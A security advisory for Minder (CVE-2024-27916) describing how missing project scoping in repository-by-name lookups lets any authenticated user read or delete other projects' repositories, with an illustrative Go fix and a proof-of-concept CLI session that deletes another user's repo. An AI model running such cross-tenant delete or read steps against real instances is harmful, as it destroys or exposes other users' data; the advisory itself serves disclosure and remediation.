
`GetRepositoryByName`, `DeleteRepositoryByName` and `GetArtifactByName` allow access to arbitrary repositories in Minder by any authenticated user

High
JAORMX published GHSA-v627-69v2-xx37 Mar 4, 2024

Package

minder

Affected versions

<0.20240304.1469_ref.45750b4

Patched versions

0.20240304.1469_ref.45750b4

Description

Summary

A Minder user can call the endpoints listed in the advisory title to read (and, for `DeleteRepositoryByName`, delete) any repository registered in the DB, irrespective of which project owns the repo and of any permissions that user holds.

Details

https://github.com/stacklok/minder/blob/e88e4b286e4bc04c03b0332a77961f085e1aa77f/database/query/repositories.sql#L22-L23
https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278

The DB query used here looks a repository up by provider name (which is always "github"), repo owner and repo name. None of these values is tied to the calling user or their project: as long as the caller has valid credentials and a provider, they can set the owner/name to any value they want and the server returns the matching row, whichever project registered it. The missing predicate is the caller's project ID; without it the lookup is an insecure direct object reference keyed on a public name.

DeleteRepositoryByName uses the same query and I have been able to delete another user's repo using this technique.

The GetArtifactByName endpoint also uses this DB query. I have not reproduced the behaviour with this endpoint due to a lack of a suitable test case, but I do not see anything in the implementation of the endpoint to prevent it being exploited.
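To make the flaw and the fix concrete, here is an added example (not Minder's code) that models the lookup against an in-memory table. Struct fields, function names, the sample project IDs and the `Caller` type are assumptions for this example; the only names taken from the page are the provider "github" and the repository JAORMX/auditevent. The unscoped variant matches on provider/owner/name only, as the advisory describes; the scoped variant adds the caller's project ID to the predicate, which in SQL terms means an extra `AND project_id = $n` in the WHERE clause of both the get and the delete query.

```go
package main

import (
	"errors"
	"fmt"
)

// ErrNotFound stands in for the gRPC NotFound status the PoC shows once the
// repository is gone. A scoped lookup returns it for other projects' rows too.
var ErrNotFound = errors.New("repository not found")

// Repository is a hypothetical flattened row; field names are assumptions.
type Repository struct {
	ID        string
	ProjectID string // the project (tenant) that registered the repo
	Provider  string // "github" in every case the advisory describes
	Owner     string
	Name      string
}

// Caller is the authenticated principal: the subject and project that
// `minder auth whoami` reports for the request.
type Caller struct {
	Subject   string
	ProjectID string
}

// Store is an in-memory stand-in for the repositories table.
type Store struct{ repos []Repository }

// NewSampleStore holds constructed sample data: one repo registered by a
// victim project. The project ID is made up for this example.
func NewSampleStore() *Store {
	return &Store{repos: []Repository{
		{ID: "repo-1", ProjectID: "project-victim", Provider: "github", Owner: "JAORMX", Name: "auditevent"},
	}}
}

func (s *Store) Len() int { return len(s.repos) }

// find returns the index of the first row matching the predicate, or -1.
func (s *Store) find(match func(Repository) bool) int {
	for i, r := range s.repos {
		if match(r) {
			return i
		}
	}
	return -1
}

// byName is the predicate the advisory describes: provider, owner and name
// only. Nothing in it depends on who is asking.
func byName(provider, owner, name string) func(Repository) bool {
	return func(r Repository) bool {
		return r.Provider == provider && r.Owner == owner && r.Name == name
	}
}

// byNameInProject adds the missing tenant check. Rows owned by other
// projects are indistinguishable from rows that do not exist.
func byNameInProject(c Caller, provider, owner, name string) func(Repository) bool {
	inner := byName(provider, owner, name)
	return func(r Repository) bool { return r.ProjectID == c.ProjectID && inner(r) }
}

// GetRepositoryByNameUnscoped reproduces the flaw: the caller is ignored.
func (s *Store) GetRepositoryByNameUnscoped(_ Caller, provider, owner, name string) (Repository, error) {
	if i := s.find(byName(provider, owner, name)); i >= 0 {
		return s.repos[i], nil
	}
	return Repository{}, ErrNotFound
}

// GetRepositoryByName is the hardened lookup, scoped to the caller's project.
func (s *Store) GetRepositoryByName(c Caller, provider, owner, name string) (Repository, error) {
	if i := s.find(byNameInProject(c, provider, owner, name)); i >= 0 {
		return s.repos[i], nil
	}
	return Repository{}, ErrNotFound
}

// DeleteRepositoryByName uses the same scoped predicate as the read, so a
// caller can never delete a row they cannot see.
func (s *Store) DeleteRepositoryByName(c Caller, provider, owner, name string) error {
	i := s.find(byNameInProject(c, provider, owner, name))
	if i < 0 {
		return ErrNotFound
	}
	s.repos = append(s.repos[:i], s.repos[i+1:]...)
	return nil
}

func main() {
	s := NewSampleStore()
	attacker := Caller{Subject: "attacker", ProjectID: "project-attacker"}
	victim := Caller{Subject: "victim", ProjectID: "project-victim"}
	_, err := s.GetRepositoryByNameUnscoped(attacker, "github", "JAORMX", "auditevent")
	fmt.Println("unscoped lookup by attacker succeeds:", err == nil)
	_, err = s.GetRepositoryByName(attacker, "github", "JAORMX", "auditevent")
	fmt.Println("scoped lookup by attacker is NotFound:", errors.Is(err, ErrNotFound))
	err = s.DeleteRepositoryByName(attacker, "github", "JAORMX", "auditevent")
	fmt.Println("scoped delete by attacker is NotFound:", errors.Is(err, ErrNotFound), "rows left:", s.Len())
	err = s.DeleteRepositoryByName(victim, "github", "JAORMX", "auditevent")
	fmt.Println("owner delete succeeds:", err == nil, "rows left:", s.Len())
}
```

The design point is that the authorization decision lives in the query predicate rather than in a separate check after the row is fetched: the delete path cannot forget the check because it shares the predicate with the read path, and a cross-tenant name resolves to NotFound rather than to PermissionDenied, so the endpoint does not even confirm that another project has registered that repository.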

PoC

Setup:

  1. Fresh provider/project on the production minder instance which is owned by me.
  2. A repo registered by another user (in this case, Ozz)

# show my identity
$ minder auth whoami
No config file present, using default values.

 Here are your details:

+----------------------------------------------------+----------------------------------------------------+
|                        KEY                         |                       VALUE                        |
+----------------------------------------------------+----------------------------------------------------+
| Subject                                            | c93cc12e-999d-49f4-9ee3-593fdfb39204               |
+----------------------------------------------------+----------------------------------------------------+
| Created At                                         | 2024-02-26 15:53:29.228 +0000                      |
|                                                    | UTC                                                |
+----------------------------------------------------+----------------------------------------------------+
| Updated At                                         | 2024-02-26 15:53:29.228 +0000                      |
|                                                    | UTC                                                |
+----------------------------------------------------+----------------------------------------------------+
| Minder Server                                      | api.stacklok.com:443                               |
+----------------------------------------------------+----------------------------------------------------+
| Project                                            | dmjb /                                             |
|                                                    | ca059552-7b8a-4c6e-918d-ca7e6cbd0bab               |
+----------------------------------------------------+----------------------------------------------------+

# show that I have no repos registered
$ minder repo list
No config file present, using default values.
+----+---------+----------+-------------+-------+------+
| ID | PROJECT | PROVIDER | UPSTREAM ID | OWNER | NAME |
+----+---------+----------+-------------+-------+------+

# show details on one of Ozz's repos
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
{
  "id":  "a7e82080-9b6c-41f3-bc08-8e9442f8b2d2",
  "context":  {
    "provider":  "github",
    "project":  "b513f7f0-26dc-42e6-81a0-577df5489e62"
  },
  "owner":  "JAORMX",
  "name":  "auditevent",
  "repoId":  "605597568",
  "hookUrl":  "https://api.github.com/repos/JAORMX/auditevent/hooks/464564107",
  "deployUrl":  "https://api.github.com/repos/JAORMX/auditevent/deployments",
  "cloneUrl":  "https://github.com/JAORMX/auditevent.git",
  "isFork":  true,
  "createdAt":  "2024-03-04T13:27:54.019356Z",
  "updatedAt":  "2024-03-04T13:27:54.019356Z",
  "defaultBranch":  "main"
}

# delete Ozz's repo
$ minder repo delete -n JAORMX/auditevent
No config file present, using default values.
Successfully deleted repo with name: JAORMX/auditevent

# Ozz's repo no longer exists
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
Message: Error getting repo by name
Details: NotFound means some requested entity (e.g., file or directory) was
not found.

Impact

Any user and project in a multi-tenant Minder instance: an authenticated user with a provider can read the registration details of, and delete, repositories registered by any other project.

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: High
Availability: None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

CVE ID

CVE-2024-27916
